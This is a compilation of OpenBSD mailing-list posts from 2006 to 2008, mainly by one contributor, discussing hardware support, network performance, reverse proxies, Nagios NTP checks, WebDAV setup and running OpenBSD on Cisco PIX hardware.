On 9 Jun 2007, at 6:22 PM, Diana Eichert wrote: A big shout out to deanna@ for getting this up on undeadly.org. Okay, y'all, with deanna@'s post of dlg@'s request on undeadly.org this is gathering steam. So, keep your cards(Credit) and letters($ EUR YEN) coming, so Santa can visit Aus. a little earlier than usual this year. diana I've just transfered another 100eu to the Belgium account for this too. Is anybody scanning ebay for a suitable machine yet ? /Pete
Re: Setting up a virtual hosting machine w. SSH/SFTP accounts - pitfalls/experiences?
For a handy pound port see: http://folesvaert.no/pound/ /Pete On 9 Jul 2007, at 4:59 PM, Richard Wilson wrote: > Stuart Henderson wrote: >> On 2007/07/08 15:30, Chris Cappuccio wrote: >>> Stuart Henderson [EMAIL PROTECTED] wrote: >>>> Or use different ports and proxy them based on host headers rather >>>> than burning IP addresses (for some RIR you are expected not to use >>>> IP addresses for non-SSL virtual web hosting). >>>> >>>> I haven't checked, but hoststated should be able to do this. >>> What software would you run on port 80 to break out the requests >>> to the >>> various apache instances? Squid with accelerator mode seems like >>> a massive >>> beast to use for this purpose. Any smaller apps? >> >> I thought you may already be able to use hoststated but I was >> mistaken. >> The least intrusive way to add it there may be to provide a new >> action >> that matches on the Host: header and allows the table name to be >> over- >> ridden (obviously this is only any good with relay, not PF tables). >> >> Other than that, it looks like Apache mod_proxy (ProxyPass) can be >> configured per-virtual-host so that should work. >> >> http://www.apsis.ch/pound/ is another option but I don't know how >> well it works on OpenBSD. I think I've seen it run here, but I don't >> know if it really works well. >> >> Varnish can probably do this too, but doesn't run here at all. >> (It's a bit of an unusual app...) >> > > I can vouch that Pound works very well on OpenBSD, and is very BSD- > like > in its style and philosophy, the developers aiming of simple, > readable, > provable code doing a specific job well. > > -- > > Richard 'Dave' Wilson > Systems Administrator > > Senokian Solutions Ltd. > Business Innovation Centre, > Binley Business Park, Coventry, > United Kingdom > CV3 2TX > T: +44 (0)24 76 233 400 > DDI: +44 (0)24 76 233 416 > F: +44 (0)24 76 233 401 > Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 SystemNet AS
Re: Hmm...
Plenty on Ebay. If Josh's is not V2, then we can try & round up enough $$$ to grab one. http://search.ebay.com/search/search.dll?_trksid=m37&satitle=WIC-1DSU- T1-V2 /Pete On 25 Jul 2007, at 12:26 AM, Steve Fairhead wrote: >>> To upgrade to a newer network setup, we kind of need a particular >>> piece > of equipment: > > Cisco T1 DSU/CSU WAN Interface Card (WIC-1DSU-T1-V2) > > http://www.cisco.com/en/US/products/hw/routers/ps221/ > products_data_sheet0918 > 6a00801a9184.html > > It has to be the V2 model. > > If someone can get one to me, that would be great. > << > > I'm happy to put e.g. $50 towards it, if money can get you one. > > Steve > http://www.fivetrees.com
Re: scanner??
Just to chime in my experiences, I have an old HP scanner/copier connected via a parallel cable to a HP jetdirect box. From my openbsd host I simply run the following to retrieve an image of current page on the scanner glass. wget -S -v -t 1 -O scan.pdf "http://jetdirect:9280/scan/scan.pdf? scan_id=1&image_format=3&paper_size=2&image_type=1&dpi=150&gamma=1" I regard this as the scanning equivalent of Bob's 'get a PS printer' to avoid the complexities of drivers... /Pete On 11 Sep 2007, at 4:52 PM, Bob Beck wrote: Interesting, because I'm seeking the same. Based on sane's site and what was at the local staples, I bought a Canon Lide 25 - however the sane support on openbsd didn't work, better yet, if I boot to windows to see if the thing is boned or not, trying to install the windows driver crashes (I get the demoplay.exe has crashed - do you wanna tell microsoft?). Needless to say I don't need the aggravation - the canon is going back to the store and based on the reccomendations here I'll look for an epson. -Bob * Vim Visual <[EMAIL PROTECTED]> [2007-09-10 04:22]: I forgot to mention... ahem... I want to use it with OpenBSD, of course... (just in case of) Pau 2007/9/10, Vim Visual <[EMAIL PROTECTED]>: Hi, Yet almost an amateur, I have totally moved to OpenBSD, I have preordered my CDs, I bought them in the last release, tshirt/s too and I am a missionary of the Unique Truth and try to convert all salvages around me to it. Now, I am looking forward to buying a scanner. I don't want a scanner, printer, washing machine and vacuum cleaner, I just want a scanner that scans documents and pictures. That's it. ... and I wonder whether any of you has a recommendation for me. Do you? Thanks a lot, Pau Amaro Seoane -- #!/usr/bin/perl if ((not 0 && not 1) != (! 0 && ! 1)) { print "Larry and Tom must smoke some really primo stuff...\n"; }
Re: Network Slowness Proliant DL380 G4
OpenBSD's bge driver sucks big time, typical symptoms are very slow transfers, and incrementing errors (netstat -i). You can confirm this by booting $other_os_boot_cd and retesting. /Pete On 6 Feb 2008, at 6:33 PM, Mark Parsons wrote: Greetings, It appears that I am having some major slowness issues on a HP Proliant DL380G4 after a fresh install of OpenBSD 4.2 i386 single processor kernel When running a iperf (http://dast.nlanr.net/Projects/Iperf/) test to a Linux host on the same physical subnet on the same physical switch we are seeing around 4Mb/sec on a Gigabit broadcom card. After changing the net.inet.tcp.sendspace and net.inet.tcp.sendspace to 262144 and running iperf again we see the speeds jump up to around 72Mb/sec which still seems slow since linux hosts on the same subnet are getting around 757Mb/sec on similar cards and hardware. I checked and my net.inet.ip.ifq.maxlen is set to 256 Should I be running a different test then iperf? Any thoughts on why I am seeing such low numbers for a Gigabit card? Any suggestions for system changes I should make? Any help is very much appreciated. The outputs of the iperf tests and dmesg are below. # /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d Server listening on TCP port 5001 TCP window size: 16.0 KByte (default) Client connecting to 192.168.129.86, TCP port 5001 TCP window size: 16.0 KByte (default) [ 6] local 192.168.129.86 port 35490 connected with 156.40.133.188 port 5001 [ 7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 52430 [ 6] 0.0-10.0 sec 5.12 MBytes 4.29 Mbits/sec [ 7] 0.0-10.1 sec 5.54 MBytes 4.61 Mbits/sec # sysctl -w net.inet.tcp.sendspace=262144 net.inet.tcp.sendspace: 16384 -> 262144 # sysctl -w net.inet.tcp.recvspace=262144 net.inet.tcp.recvspace: 16384 -> 262144 # /root/iperf-2.0.2/src/iperf -c 192.168.129.86 -d Server listening on TCP port 5001 TCP window size: 256 KByte (default) Client connecting to 192.168.129.86, TCP port 5001 TCP window size: 256 KByte (default) [ 6] local 192.168.129.86 port 45594 connected with 156.40.133.188 port 5001 [ 7] local 192.168.129.86 port 5001 connected with 156.40.133.188 port 50890 [ 6] 0.0-10.0 sec 86.0 MBytes 72.0 Mbits/sec [ 7] 0.0-10.0 sec 85.0 MBytes 71.1 Mbits/sec Dmesg: OpenBSD 4.2 (GENERIC) #375: Tue Aug 28 10:38:44 MDT 2007 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Xeon(TM) CPU 3.60GHz ("GenuineIntel" 686-class) 3.61 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE3 6,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS- CPL,EST,TM2,CNXT-ID,CX16,xTPR real mem = 3757613056 (3583MB) avail mem = 3650039808 (3480MB) mainbus0 at root bios0 at mainbus0: AT/286+ BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf, SMBIOS rev. 2.3 @ 0xec000 (58 entries) bios0: vendor HP version "P51" date 08/26/2004 bios0: HP ProLiant DL380 G4 pcibios0 at bios0: rev 2.1 @ 0xf/0x2000 pcibios0: PCI BIOS has 7 Interrupt Routing table entries pcibios0: PCI Interrupt Router at 000:31:0 ("Intel 82801EB/ER LPC" rev 0x00) pcibios0: PCI bus #10 is the last bus bios0: ROM list: 0xc/0x8000 0xc8000/0x4000! 0xee000/0x2000! acpi at mainbus0 not configured cpu0 at mainbus0 cpu0: Enhanced SpeedStep disabled by BIOS pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 "Intel E7520 MCH" rev 0x0a ppb0 at pci0 dev 2 function 0 "Intel MCH PCIE" rev 0x0a pci1 at ppb0 bus 2 ppb1 at pci1 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09 pci2 at ppb1 bus 3 bge0 at pci2 dev 1 function 0 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 5, address 00:0f:20:f7:52:f1 brgphy0 at bge0 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0 bge1 at pci2 dev 1 function 1 "Broadcom BCM5704C" rev 0x10, BCM5704 B0 (0x2100): irq 5, address 00:0f:20:f7:52:f0 brgphy1 at bge1 phy 1: BCM5704 10/100/1000baseT PHY, rev. 0 ppb2 at pci1 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09 pci3 at ppb2 bus 4 ciss0 at pci3 dev 3 function 0 "Compaq Smart Array 64xx" rev 0x01: irq 5 ciss0: 1 LD, HW rev 1, FW 2.26/2.26 scsibus0 at ciss0: 1 targets sd0 at scsibus0 targ 0 lun 0: SCSI0 0/ direct fixed sd0: 173639MB, 22135 cyl, 255 head, 63 sec, 512 bytes/sec, 355612800 sec total ppb3 at pci0 dev 6 function 0 "Intel MCH PCIE" rev 0x0a pci4 at ppb3 bus 5 ppb4 at pci4 dev 0 function 0 "Intel PCIE-PCIE" rev 0x09 pci5 at ppb4 bus 6 ppb5 at pci4 dev 0 function 2 "Intel PCIE-PCIE" rev 0x09 pci6 at ppb5 bus 10 uhci0 at pci0 dev 29 function 0 "Intel 82801EB/ER USB" rev 0x02: irq 5 uhci1 at pci0 dev 29 function
Re: zombies - solved
If you want to serve http content via IPv6, then perhaps you can run httpd on your (IPv4) loopback interface, and have relayd listen on your public IPv6 interface, and forward requests over IPv4 to it ? /Pete On 12 Mar 2008, at 4:22 PM, Lars Noodin wrote: Theo de Raadt wrote: apache2 is not free enough. Ok. There were some additional reasons mentioned, but licensing is enough on its own. I found the old announcement now that I know what to look for: http://archives.neohapsis.com/archives/openbsd/2004-06/0448.html Apache 1.3.29 is decent enough and has the functionality, name brand recognition and familiarity needed. But without updates, it seems a dead end and not a good idea for new activities. I'm also not finding reference to IPv6 in the documentation for Apache 1.3.x either online or in the man pages and that was my main reason for even looking at Apache2. A fork does not seem like a good return on investment, so v 1.3.29 will probably go away sooner than later once the Apache Foundation drops maintenance on the 1.3 series. Gregg proposed, nginx ( http://nginx.net/ ), which seems to be just getting started. It's under a 'BSD-like' license. It might work, but seems new. I see Lighttpd already in the 'packages' and it is under an appropriate license. In the last year, it has gained a lot in both visibility and user-base. In a lot of cases, perhaps most, new setups could be steered towards Lighttpd, if it were mentioned in the documentation here and there. I probably would have chosen it over grabbing Apache2 from the ports tree had it been mentioned. Apache2 and Lighttpd both required some adjustment and I would rather future-proof my activities, just in case they have to be supported that long. The mention of it can be small and does not need to affect how things are currently done. But as more use it, it will be easier later to drop Apache when (if) the time comes. Would something like this be appropriate at the tail end of the httpd man page for v 1.3.29? Due to licensing changes, the version of Apache shipped with OpenBSD will stay at version 1.3.29. Bugfixes will be provided, but no further updates. Alternatively, Lighttpd is available via OpenBSD's packages. Regards, -Lars
nagios monitoring of a remote openntp service
Hi, Has anybody gotten Nagois' check_ntp_* to play nicely with a remote openntp service ? It appears to rely upon services not implemented in openntp ? /Pete
Re: nagios monitoring of a remote openntp service
Hi, That's not the problem ! - the hosting is correctly listening, and indeed other hosts are correctly syncing to it. It's only the nagios check_ntp_* that doesn't like it. $ ~> grep -i listen /etc/ntpd.conf # Addresses to listen on (ntpd does not listen by default) listen on * $ ~> ps -aux | grep ntp _ntp 18182 0.0 0.0 468 612 ?? S 19Nov065:57.94 ntpd: ntp engine (ntpd) root 10889 0.0 0.0 512 616 ?? Is19Nov060:00.24 ntpd: [priv] (ntpd) /Pete On 8 May 2008, at 12:59 PM, Dave Ewart wrote: On Thursday, 08.05.2008 at 11:53 +0200, Pete Vickers wrote: Has anybody gotten Nagois' check_ntp_* to play nicely with a remote openntp service ? It appears to rely upon services not implemented in openntp ? openntpd does not listen on port 123 by default: that's what Nagios would use to monitor, Check man ntpd.conf for the 'listen' option. Dave. -- Dave Ewart [EMAIL PROTECTED], jabber:[EMAIL PROTECTED], freenode:davee All email from me is now digitally signed, http://www.sungate.co.uk/ Fingerprint: AEC5 9360 0A35 7F66 66E9 82E4 9E10 6769 CD28 DA92
Re: nagios monitoring of a remote openntp service
that works fine: $ ~>/usr/local/libexec/nagios/check_ntp_time -H ntp1 NTP OK: Offset 0.0008395434124 secs|offset=0.000840s; 60.00;120.00; but, I'm trying to verifty the NTP server's health, not that my monitoring host is sync'd to it. "Notes: This plugin checks the clock offset between the local host and a remote NTP server. It is independent of any commandline programs or external libraries. If you'd rather want to monitor an NTP server, please use check_ntp_peer." but that doesn't work (for me) : $ ~>/usr/local/libexec/nagios/check_ntp_peer -H ntp1 -t 3 CRITICAL - Socket timeout after 3 seconds /Pete On 8 May 2008, at 1:55 PM, Stuart Henderson wrote: On 2008-05-08, Pete Vickers <[EMAIL PROTECTED]> wrote: Has anybody gotten Nagois' check_ntp_* to play nicely with a remote openntp service ? It appears to rely upon services not implemented in openntp ? this is against an OpenNTP server; <[EMAIL PROTECTED]:12>$ /usr/local/libexec/nagios/check_ntp_time -H ntp NTP OK: Offset -0.002711469308 secs|offset=-0.002711s; 60.00;120.00; so, it can work.
eeepc acpi
Hi Matthieu, Just a quick note concerning the eeepc i386-laptop.html entry. I acquired one today, and installed OpenBSD via pxeboot using the builtin ethernet interface. Then I discovered it's not entire acpi that causes panics, it's only acpibat. If you boot -c (or config -e) then: - disable apm - enable acpi - disable acpibat you'll get the following: # sysctl hw hw.machine=i386 hw.model=Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686- class) hw.ncpu=1 hw.byteorder=1234 hw.pagesize=4096 hw.disknames=wd0,sd0 hw.diskcount=2 hw.sensors.acpitz0.temp0=54.05 degC (zone temperature) hw.sensors.acpiac0.indicator0=On (power supply) hw.cpuspeed=631 hw.setperf=100 hw.vendor=ASUSTeK Computer INC. hw.product=701 hw.version=x.x hw.serialno=EeePC-1234567890 hw.uuid=80480a3a-bf04-dd81-37b7-001fc65688ff hw.physmem=527527936 hw.usermem=527523840 # and # apmd # apm -A # apm Battery state: absent, 0% remaining, unknown life estimate A/C adapter state: connected Performance adjustment mode: auto (75 MHz) Full dmesg below: /Pete OpenBSD 4.3-current (GENERIC) #853: Fri May 2 04:37:23 MDT 2008 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Celeron(R) M processor 900MHz ("GenuineIntel" 686- class) 631 MHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,CFLUSH ,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,TM,SBF real mem = 527527936 (503MB) avail mem = 501972992 (478MB) mainbus0 at root bios0 at mainbus0: AT/286+ BIOS, date 03/03/08, BIOS32 rev. 0 @ 0xf0010, SMBIOS rev. 2.5 @ 0xf06e0 (37 entries) bios0: vendor American Megatrends Inc. version "0910" date 03/03/2008 bios0: ASUSTeK Computer INC. 701 apm at bios0 function 0x15 not configured acpi0 at bios0: rev 0 acpi0: tables DSDT FACP APIC OEMB MCFG acpi0: wakeup devices P0P3(S0) P0P4(S0) P0P5(S0) P0P6(S0) P0P7(S0) MC97(S0) USB1(S0) USB2(S0) USB3(S0) USB4(S0) EUSB(S0) acpitimer0 at acpi0: 3579545 Hz, 24 bits acpiprt0 at acpi0: bus 0 (PCI0) acpiprt1 at acpi0: bus 5 (P0P3) acpiprt2 at acpi0: bus 3 (P0P5) acpiprt3 at acpi0: bus 1 (P0P6) acpiec0 at acpi0 acpicpu0 at acpi0: C3, C2 acpitz0 at acpi0: critical temperature 90 degC acpibat at acpi0 not configured acpiac0 at acpi0: AC unit online acpiasus0 at acpi0 acpibtn0 at acpi0: LID_ acpibtn1 at acpi0: SLPB acpibtn2 at acpi0: PWRB bios0: ROM list: 0xc/0xf800! cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 "Intel 82915GM Host" rev 0x04 vga1 at pci0 dev 2 function 0 "Intel 82915GM Video" rev 0x04 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) agp0 at vga1: aperture at 0xd000, size 0x1000 "Intel 82915GM Video" rev 0x04 at pci0 dev 2 function 1 not configured azalia0 at pci0 dev 27 function 0 "Intel 82801FB HD Audio" rev 0x04: irq 5 azalia0: codec[s]: Realtek/0x0662 audio0 at azalia0 ppb0 at pci0 dev 28 function 0 "Intel 82801FB PCIE" rev 0x04: irq 5 pci1 at ppb0 bus 4 ppb1 at pci0 dev 28 function 1 "Intel 82801FB PCIE" rev 0x04: irq 11 pci2 at ppb1 bus 3 lii0 at pci2 dev 0 function 0 "Attansic Technology L2" rev 0xa0: irq 11, address 00:1f:c6:56:88:ff ukphy0 at lii0 phy 1: Generic IEEE 802.3u media interface, rev. 2: OUI 0x001374, model 0x0002 ppb2 at pci0 dev 28 function 2 "Intel 82801FB PCIE" rev 0x04: irq 10 pci3 at ppb2 bus 1 uhci0 at pci0 dev 29 function 0 "Intel 82801FB USB" rev 0x04: irq 3 uhci1 at pci0 dev 29 function 1 "Intel 82801FB USB" rev 0x04: irq 7 uhci2 at pci0 dev 29 function 2 "Intel 82801FB USB" rev 0x04: irq 10 uhci3 at pci0 dev 29 function 3 "Intel 82801FB USB" rev 0x04: irq 5 ehci0 at pci0 dev 29 function 7 "Intel 82801FB USB" rev 0x04: irq 3 usb0 at ehci0: USB revision 2.0 uhub0 at usb0 "Intel EHCI root hub" rev 2.00/1.00 addr 1 ppb3 at pci0 dev 30 function 0 "Intel 82801BAM Hub-to-PCI" rev 0xd4 pci4 at ppb3 bus 5 ichpcib0 at pci0 dev 31 function 0 "Intel 82801FBM LPC" rev 0x04: PM disabled pciide0 at pci0 dev 31 function 2 "Intel 82801FBM SATA" rev 0x04: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility wd0 at pciide0 channel 1 drive 0: wd0: 1-sector PIO, LBA, 3815MB, 7815024 sectors wd0(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 4 ichiic0 at pci0 dev 31 function 3 "Intel 82801FB SMBus" rev 0x04: irq 7 iic0 at ichiic0 spdmem0 at iic0 addr 0x50: 512MB DDR2 SDRAM non-parity PC2-5300CL5 SO- DIMM usb1 at uhci0: USB revision 1.0 uhub1 at usb1 "Intel UHCI root hub" rev 1.00/1.00 addr 1 usb2 at uhci1: USB revision 1.0 uhub2 at usb2 "Intel UHCI root hub" rev 1.00/1.00 addr 1 usb3 at uhci2: USB revision 1.0 uhub3 at usb3 "Intel UHCI root hub" rev 1.00/1.00 addr 1 usb4 at uhci3: USB revision 1.0
Re: umsm(4) SprintPCS users -- Merlin PC720 anyone?
I don't know about Merlin PC720, but I recently got a Merlin XU870, and it works fine out of the box: # cu -l /dev/cuaU0 -s 230400 Connected ati3 Manufacturer: Novatel Wireless Incorporated Model: Merlin XU870 ExpressCard Revision: 9.2.00.0-00 [2006-08-03 13:07:27] IMEI: xxx +GCAP: +CGSM,+DS,+ES OK dmesg: Mar 27 16:45:40 n800c /bsd: OpenBSD 4.1-beta (GENERIC) #1410: Sun Feb 25 19:55:40 MST 2007 ... Mar 27 16:45:54 n800c /bsd: ohci2 at cardbus0 dev 0 function 0 "NEC USB" rev 0x43: irq 11, version 1.0 Mar 27 16:45:54 n800c /bsd: usb3 at ohci2: USB revision 1.0 Mar 27 16:45:54 n800c /bsd: uhub3 at usb3 Mar 27 16:45:54 n800c /bsd: uhub3: NEC OHCI root hub, rev 1.00/1.00, addr 1 Mar 27 16:45:54 n800c /bsd: uhub3: 3 ports with 3 removable, self powered Mar 27 16:45:54 n800c /bsd: ohci3 at cardbus0 dev 0 function 1 "NEC USB" rev 0x43: irq 11, version 1.0 Mar 27 16:45:55 n800c /bsd: usb4 at ohci3: USB revision 1.0 Mar 27 16:45:55 n800c /bsd: uhub4 at usb4 Mar 27 16:45:55 n800c /bsd: uhub4: NEC OHCI root hub, rev 1.00/1.00, addr 1 Mar 27 16:45:55 n800c /bsd: uhub4: 2 ports with 2 removable, self powered Mar 27 16:45:58 n800c /bsd: umsm0 at uhub3 port 1 Mar 27 16:45:58 n800c /bsd: Mar 27 16:45:58 n800c /bsd: umsm0: Novatel Wireless Novatel Wireless HSDPA Modem, rev 1.10/0.00, addr 2 Mar 27 16:45:58 n800c /bsd: ucom0 at umsm0 portno 0 (although it drops into ddb if I eject it while running...) regards / mvh, Pete Vickers [EMAIL PROTECTED] // +47 48 17 91 00 On 27. mar. 2007, at 01.46, Jeff Quast wrote: I've been happily using a umsm(4) sierra wireless aircard 580[1]. It literally took less than 5 minutes to get this card moving in OpenBSD with the ppp.conf example in umsm(4). Highly recommend this card, its about $60 on ebay these days. EVDO rev a was deployed to my area, and I was happy with the sierra model (though not ecstatic over the latency), so I purchased a 'Sierra wireless aircard 595' [2]. Somebody reported success in linux[3] with this card, and umsm(4) listed this device as a maybe. I forked out the $262, and Unfortunately this was not the 5-minute success story as I had hoped for. Although it attached to ucom0, if I used cu -l /dev/cuaU0 -s 230400, I was not able to input an "at" (and receive "OK", such as on the 580). I wondered if the 168Mhz laptop I was using it with was too old (pcmcia type II? what? it fit...), so I built a fresh 1.2Ghz i386 and used a pci<->pcmcia card with similar deadlock serial. This also failed the same way on macppc. There is a 30 day return limit on these, so I've re-activated the 580 (effectively disabling the new card) and returned this product. So my question: I am using sprintpcs as my provider. Can anybody report success with the 'Merlin PC720' [4]? 1. http://www.sierrawireless.com/product/ac580.aspx 2. http://www.sierrawireless.com/product/ac595.aspx 3. http://www.pbandjelly.org/2006/12/sierra-wireless-aircard-595- configuration-sprintpcs/ 4. http://www.novatelwireless.com/products/merlin/merlin-pc720.html Thanks, jdq
Re: Distributed File System
try web DAV - works a treat for me on OpenBSD with linux, Mac & windows clients... /pete On 17 Apr 2007, at 2:28 AM, Rico Secada wrote: Hi all. At work I am experiencing with setting up some distributed file system, at the current moment working with NFS. The problem is that it is being setup at work and people, from their homes, need to be able to mount the system. I have no prior experience in this, except for setting up and using NFS across a LAN. I would greatly appreciate any recommendations regarding security, effectiveness and other advices! I have been thinking about tunneling NFS over SSH2, and possibly using some kind of cache, but I do not know if this is actually the best approach. I have also been thinking about using AFS as posted before. Also perhaps, but not necessary, support for Windows could be needed in the long run. What are you guys using and how is it setup? Best and kind regards! Rico.
Re: running OpenBSD on switch hardware
Pete Vickers [EMAIL PROTECTED] | +47 48 17 91 00 Systemnet AS On 20 Apr 2007, at 10:42 AM, Claudio Jeker wrote: On Fri, Apr 20, 2007 at 09:48:44AM +0200, Toni Mueller wrote: Hi Claudio, On Fri, 06.04.2007 at 12:09:38 +0200, Claudio Jeker <[EMAIL PROTECTED]> wrote: Even the most expensive Cisco/Foundry/Extreme switches have not the CPU power to route or filter packets. how comes they boast running BGP and such stuff? Eg. Cisco 6509 and up, or Extreme Black Diamond? This requires real routing capabilities, doesn't it? Depends on your definition of routing capabilities. Layer 3 switches (ab)use the CAM to do route lookups. For example the Cisco 7600 switching router is able to route/switch at high pps rates under normal (lab) circumstances but they start to trash when your network is under a DDoS attack. This comes from the fact that the CAM table is overflooded and so many packets are redirected to the CPU for a slow routing lookup. Most L3 switches have small CAM tables and so only small routing tables can be handled efficently on those systems (small as in <20'000 routes which is nothing compared to the 215'000 bgp prefixes seen on a full view). Also note that switching router do lookups in HW so any feature that is not part of the HW engine needs help from the main CPU. Tunneling, IPsec, statefull filtering, L2TP, MPLS VPN and so on are either not available or are done fully in software. L3 switches can be compared to running a system with 64M Ram and 4GB of swap. Paging and swapping makes the box comparable to one with 4GB of RAM until your running processes start to use more than the 64M available. -- :wq Claudio Hi, With SUP32/SUP720 and PFC2/3 this is much less a problem, as stated below. In fact, you can do a lot of config on the TCAM itself to mitigate DDoS associated problems: http://www.cisco.com/en/US/products/hw/switches/ps708/ products_white_paper09186a00800c9470.shtml#wp43045 /Pete
RFC 3623 support in OSPFd
Hi, I'm trying to use OSPFd in a 'high availability' environment, where it's next-hop h/a pair (mis)use RFC3623 (Graceful OSPF Restart) to provide rapid failover between nodes. However it appears OSPFd doesn't support this ? Before I dig into this, can norby/claudio/henning cast any light on the subject ? # uname -a OpenBSD lab-netrax1.test 4.1 GENERIC#1099 sparc64 /Pete
Re: openbsd on cisco hardware?
most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the past, nothing special except flash boot. pix515e# sh ver ... Hardware: PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz Flash E28F128J3 @ 0xfff0, 16MB BIOS Flash AM29F400B @ 0xfffd8000, 32KB ... 0: Ext: Ethernet0 : address is 0012.00e1.cd67, irq 10 1: Ext: Ethernet1 : address is 0012.00e1.cd68, irq 11 2: Ext: Ethernet2 : address is 000e.0c59.bd1a, irq 11 ... Interface Ethernet0 "outside", is up, line protocol is up Hardware is i82559, BW 100 Mbps Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps) ... they usually even come with a (non functioning under PIXOS) USB port too. /Pete On 13. nov. 2006, at 04.30, Jason George wrote: i know this is likely not possible for a number of reasons but i figured i'd ask: are there or have there been any plans to port openbsd to run on cisco hardware? googling for something like this is not very productive since the CARP vs. VRRP and firewall interoperation links dominate searches with "cisco openbsd" in them. Older Cisco routers will typically have a Motorola 68k or some MIPS- based processor. These devices will also usually have minimal RAM (1 to 4M). Not exactly a great setup for a target platform... I seem to recall that the 030-based Mot systems may have also be lacking in a proper MMU, but I could be wrong. I'm sure I'll be corrected by someone on the list. Newer gear will have a MIPS or PowerPC processor in them. x86 PIX boxes could conceivably be a target platform, but their lack of storage would require a flashboot-style installation, and thus would not be supported in an official manner, if even they were made to boot successfully. The same would go for the non-x86 modern gear. Frankly, Cisco's devices aren't even price-attractive, so as much as it would be mildly interesting to run OpenBSD on some PIX 515 boxes, it's a waste of time and money. --Jason
Re: openbsd on cisco hardware?
Apples & oranges I believe, this *might* be why: [EMAIL PROTECTED] ~/Desktop> file pix706.bin bsd.rd floppy40.fs pix706.bin: x86 boot sector bsd.rd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped floppy40.fs: x86 boot sector /Pete On 13. nov. 2006, at 16.06, Jason George wrote: most PIX boxes are i386 based. IIRC I've booted bsd.rd on them in the past, nothing special except flash boot. pix515e# sh ver ... Hardware: PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz Flash E28F128J3 @ 0xfff0, 16MB BIOS Flash AM29F400B @ 0xfffd8000, 32KB ... 0: Ext: Ethernet0 : address is 0012.00e1.cd67, irq 10 1: Ext: Ethernet1 : address is 0012.00e1.cd68, irq 11 2: Ext: Ethernet2 : address is 000e.0c59.bd1a, irq 11 ... Interface Ethernet0 "outside", is up, line protocol is up Hardware is i82559, BW 100 Mbps Auto-Duplex(Full-duplex), Auto-Speed(100 Mbps) ... they usually even come with a (non functioning under PIXOS) USB port too. I grabbed an old PIX 501 off the shelf... no such luck booting a standard i386 ramdisk image. CISCO SYSTEMS PIX-501 Embedded BIOS Version 4.3.200 07/31/01 15:58:22.08 Compiled by morlee 16 MB RAM PCI Device Table. Bus Dev Func VendID DevID Class Irq 00 00 00 1022 3000 Host Bridge 00 11 00 8086 1209 Ethernet 9 00 12 00 8086 1209 Ethernet 10 Cisco Secure PIX Firewall BIOS (4.2) #6: Mon Aug 27 15:09:54 PDT 2001 Platform PIX-501 Flash=E28F640J3 @ 0x300 Use BREAK or ESC to interrupt flash boot. Use SPACE to begin flash boot immediately. Flash boot interrupted. 0: i8255X @ PCI(bus:0 dev:17 irq:9 ) 1: i8255X @ PCI(bus:0 dev:18 irq:10) Using 1: i82557 @ PCI(bus:0 dev:18 irq:10), MAC: 0011.935f.08c6 Use ? for help. monitor> addr 192.168.4.234 address 192.168.4.234 monitor> server 192.168.4.3 server 192.168.4.3 monitor> file bsd.rd file bsd.rd monitor> ping 192.168.4.3 Sending 5, 100-byte 0xc3f8 ICMP Echoes to 192.168.4.3, timeout is 4 seconds: ! Success rate is 100 percent (5/5) monitor> tftp tftp [EMAIL PROTECTED] [snip] Received 4938658 bytes Bad magic number (0xab00450) monitor>
Re: WebDAV
Hi, I've used it problem free with osx & windows clients; it should probably only be available only over https, DocumentRoot "/var/www/secure_content" ServerName whatever.com ServerAlias www.whatever.com ServerAdmin [EMAIL PROTECTED] ErrorLog logs/error_log TransferLog logs/access_log DAV On AuthType Basic AuthName "whatever.com network disk" AuthUserFile /var/www/conf/passwd AllowOverride None Require valid-user Options None LOCK UNLOCK> DAVLockDB /dav_scratch/DAVLock DAVMinTimeout 600 SSLEngine on SSLCertificateFile/etc/ssl/server.crt SSLCertificateKeyFile /etc/ssl/private/server.key CustomLog logs/ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" /Pete On 1. des. 2006, at 22.00, Gaby Vanhegan wrote: Hi, Although the mail archives have little on the topic, as does google, are there any major security concerns I should be aware of when installing mod_dav under the stock OpenBSD apache1.3, with apache chrooted? Gaby -- Junkets for bunterish lickspittles since 1998! http://www.playr.co.uk/sudoku/ http://weblog.vanhegan.net/
Performance problems with bge under OpenBSD4.0/i386
